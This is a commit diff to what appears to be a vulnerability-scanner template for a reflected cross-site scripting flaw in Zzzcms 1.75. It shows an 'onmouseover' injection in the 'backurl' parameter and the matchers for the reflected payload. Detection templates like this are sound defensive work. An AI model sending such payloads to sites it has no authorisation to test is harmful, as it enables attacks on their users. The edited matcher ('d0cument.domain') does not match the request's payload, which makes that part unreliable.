added reference

patch-1
Dhiyaneshwaran 2023-08-07 23:40:55 +05:30 committed by GitHub
parent cf6628114b
commit 7ca836f403
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 2 deletions

View File

@ -4,6 +4,8 @@ info:
name: Zzzcms 1.75 - Cross-Site Scripting name: Zzzcms 1.75 - Cross-Site Scripting
author: ritikchaddha author: ritikchaddha
severity: medium severity: medium
reference:
- https://github.com/Ares-X/VulWiki/blob/master/Web%E5%AE%89%E5%85%A8/Zzzcms/Zzzcms%201.75%20xss%E6%BC%8F%E6%B4%9E.md
metadata: metadata:
max-request: 1 max-request: 1
verified: true verified: true
@ -14,7 +16,7 @@ info:
http: http:
- raw: - raw:
- | - |
GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/XSS/)%20y%3d HTTP/1.1 GET /plugins/template/login.php?backurl=1%20onmouseover%3dalert(/document.domain/)%20y%3d HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers-condition: and matchers-condition: and
@ -22,7 +24,7 @@ http:
- type: word - type: word
part: body part: body
words: words:
- 'onmouseover=alert(/XSS/) y=&act' - 'onmouseover=alert(/d0cument.domain/) y=&act'
- 'document.write("' - 'document.write("'
condition: and condition: and